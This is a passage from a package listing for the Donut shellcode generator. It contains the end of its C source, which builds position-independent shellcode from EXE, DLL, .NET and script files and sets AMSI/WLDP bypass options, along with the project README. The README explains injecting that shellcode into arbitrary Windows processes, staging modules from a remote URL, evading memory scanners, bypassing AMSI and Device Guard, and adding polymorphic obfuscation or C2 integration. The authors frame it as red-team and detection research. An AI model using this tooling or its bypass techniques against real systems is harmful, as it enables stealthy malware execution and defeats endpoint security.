796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
821
822 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
965
966 // if DEBUG is defined, save instance to disk
967 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
975 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
988 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
990 } else
991 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
993 } else
994 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
999 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1003 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1006 }
1007
1008 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1010 pl = (uint8_t*)c->pic;
1011 // call $ + c->inst_len
1012 PUT_BYTE(pl, 0xE8);
1013 PUT_WORD(pl, c->inst_len);
1014 PUT_BYTES(pl, c->inst, c->inst_len);
1015 // pop ecx
1016 PUT_BYTE(pl, 0x59);
1017
1018 // x86?
1019 if(c->arch == DONUT_ARCH_X86) {
1020 // pop edx
1021 PUT_BYTE(pl, 0x5A);
1022 // push ecx
1023 PUT_BYTE(pl, 0x51);
1024 // push edx
1025 PUT_BYTE(pl, 0x52);
1026
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1029
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1031 } else
1032 // AMD64?
1033 if(c->arch == DONUT_ARCH_X64) {
1034
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1037
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1039 } else
1040 // x86 + AMD64?
1041 if(c->arch == DONUT_ARCH_X84) {
1042
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1045
1046 // xor eax, eax
1047 PUT_BYTE(pl, 0x31);
1048 PUT_BYTE(pl, 0xC0);
1049 // dec eax
1050 PUT_BYTE(pl, 0x48);
1051 // js dword x86_code
1052 PUT_BYTE(pl, 0x0F);
1053 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1056 // pop edx
1057 PUT_BYTE(pl, 0x5A);
1058 // push ecx
1059 PUT_BYTE(pl, 0x51);
1060 // push edx
1061 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1065 // if there was some error, release resources
1066 if(err != DONUT_ERROR_SUCCESS) {
1067 DonutDelete(c);
1068 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1071 return err;
1072 }
1073
1074 // release resources allocated for configuration
1075 EXPORT_FUNC
1076 int DonutDelete(PDONUT_CONFIG c) {
1077
1078 DPRINT("Entering.");
1079 if(c == NULL) {
1080 return DONUT_ERROR_INVALID_PARAMETER;
1081 }
1082 // free module
1083 if(c->mod != NULL) {
1084 free(c->mod);
1085 c->mod = NULL;
1086 }
1087 // free instance
1088 if(c->inst != NULL) {
1089 free(c->inst);
1090 c->inst = NULL;
1091 }
1092 // free payload
1093 if(c->pic != NULL) {
1094 free(c->pic);
1095 c->pic = NULL;
1096 }
1097 DPRINT("Leaving.");
1098 return DONUT_ERROR_SUCCESS;
1099 }
1100
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1105 static const char *str="N/A";
1106
1107 switch(err) {
1108 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1110 break;
1111 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1113 break;
1114 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1116 break;
1117 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1119 break;
1120 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1122 break;
1123 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1125 break;
1126 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1128 break;
1129 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1131 break;
1132 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1134 break;
1135 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1137 break;
1138 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1140 break;
1141 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1143 break;
1144 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1146 break;
1147 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1149 break;
1150 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1152 break;
1153 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1157 return str;
1158 }
1159
1160 static char* get_param (int argc, char *argv[], int *i) {
1161 int n = *i;
1162 if (argv[n][2] != 0) {
1163 return &argv[n][2];
1164 }
1165 if ((n+1) < argc) {
1166 *i = n + 1;
1167 return argv[n+1];
1168 }
1169 printf(" [ %c%c requires parameter\n", argv[n][0], argv[n][1]);
1170 exit (0);
1171 }
1172
1173 static void usage (void) {
1174 printf(" usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>\n\n");
1175
1176 printf(" -MODULE OPTIONS-\n\n");
1177 printf(" -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.\n");
1178 printf(" -u <URL> HTTP server that will host the donut module.\n\n");
1179
1180 printf(" -PIC/SHELLCODE OPTIONS-\n\n");
1181 printf(" -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n");
1182 printf(" -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n");
1183 printf(" -o <payload> Output file. Default is \"payload.bin\"\n\n");
1184
1185 printf(" -DOTNET OPTIONS-\n\n");
1186 printf(" -c <namespace.class> Optional class name. (required for .NET DLL)\n");
1187 printf(" -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)\n");
1188 printf(" -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.\n");
1189 printf(" -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n");
1190 printf(" -d <name> AppDomain name to create for .NET. Randomly generated by default.\n\n");
1191
1192 printf(" examples:\n\n");
1193 printf(" donut -f c2.dll\n");
1194 printf(" donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n");
1195 printf(" donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/\n");
1196
1197 exit (0);
1198 }
1199
1200 int main(int argc, char *argv[]) {
1201 DONUT_CONFIG c;
1202 char opt;
1203 int i, err;
1204 FILE *fd;
1205 char *mod_type, *payload="payload.bin",
1206 *arch_str[3] = { "x86", "AMD64", "x86+AMD64" };
1207 char *inst_type[2]= { "PIC", "URL" };
1208
1209 printf("\n");
1210 printf(" [ Donut shellcode generator v0.9.2\n");
1211 printf(" [ Copyright (c) 2019 TheWover, Odzhan\n\n");
1212
1213 // zero initialize configuration
1214 memset(&c, 0, sizeof(c));
1215
1216 // default type is position independent code for dual-mode (x86 + amd64)
1217 c.inst_type = DONUT_INSTANCE_PIC;
1218 c.arch = DONUT_ARCH_X84;
1219 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
1220
1221 // parse arguments
1222 for(i=1; i<argc; i++) {
1223 // switch?
1224 if(argv[i][0] != '-' && argv[i][0] != '/') {
1225 usage();
1226 }
1227 opt = argv[i][1];
1228
1229 switch(opt) {
1230 // target cpu architecture
1231 case 'a':
1232 c.arch = atoi(get_param(argc, argv, &i));
1233 break;
1234 // bypass options
1235 case 'b':
1236 c.bypass = atoi(get_param(argc, argv, &i));
1237 break;
1238 // name of domain to use for .NET assembly
1239 case 'd':
1240 strncpy(c.domain, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1241 break;
1242 // EXE/DLL/VBS/JS/XSL file to embed in shellcode
1243 case 'f':
1244 strncpy(c.file, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1245 break;
1246 // runtime version to use for .NET DLL / EXE
1247 case 'r':
1248 strncpy(c.runtime, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1249 break;
1250 // URL of remote module
1251 case 'u': {
1252 strncpy(c.url, get_param(argc, argv, &i), DONUT_MAX_URL - 2);
1253 c.inst_type = DONUT_INSTANCE_URL;
1254 break;
1255 }
1256 // class of .NET assembly
1257 case 'c':
1258 strncpy(c.cls, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1259 break;
1260 // method of .NET assembly
1261 case 'm':
1262 strncpy(c.method, get_param(argc, argv, &i), DONUT_MAX_NAME - 1);
1263 break;
1264 // output file for payload
1265 case 'o':
1266 payload = get_param(argc, argv, &i);
1267 break;
1268 // parameters to method or DLL function
1269 case 'p':
1270 strncpy(c.param, get_param(argc, argv, &i), sizeof(c.param) - 1);
1271 break;
1272 default:
1273 usage();
1274 break;
1275 }
1276 }
1277
1278 // no file? show usage and exit
1279 if(c.file[0] == 0) {
1280 usage();
1281 }
1282
1283 // generate payload from configuration
1284 err = DonutCreate(&c);
1285
1286 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
1288 return 0;
1289 }
1290
1291 switch(c.mod_type) {
1292 case DONUT_MODULE_DLL:
1293 mod_type = "DLL";
1294 break;
1295 case DONUT_MODULE_EXE:
1296 mod_type = "EXE";
1297 break;
1298 case DONUT_MODULE_NET_DLL:
1299 mod_type = ".NET DLL";
1300 break;
1301 case DONUT_MODULE_NET_EXE:
1302 mod_type = ".NET EXE";
1303 break;
1304 case DONUT_MODULE_VBS:
1305 mod_type = "VBScript";
1306 break;
1307 case DONUT_MODULE_JS:
1308 mod_type = "JScript";
1309 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
1313 default:
1314 mod_type = "Unrecognized";
1315 break;
1316 }
1317 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
1319 printf(" [ File type : %s\n", mod_type);
1320
1321 // if this is a .NET DLL, display the class and method
1322 if(c.mod_type == DONUT_MODULE_NET_DLL) {
1323 printf(" [ Class : %s\n", c.cls );
1324 printf(" [ Method : %s\n", c.method);
1325 } else
1326 if(c.mod_type == DONUT_MODULE_DLL) {
1327 printf(" [ Function : %s\n",
1328 c.method[0] != 0 ? c.method : "DllMain");
1329 }
1330 // if parameters supplied, display them
1331 if(c.param[0] != 0) {
1332 printf(" [ Parameters : %s\n", c.param);
1333 }
1334 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
1335
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
1337 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
1339 }
1340
1341 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1343 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
1344
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
1355 DonutDelete(&c);
1356 return 0;
1357 }
1358 #endif
+264
-0
donut_shellcode.egg-info/PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+103
-0
donut_shellcode.egg-info/SOURCES.txt less more
0 LICENSE
1 MANIFEST.in
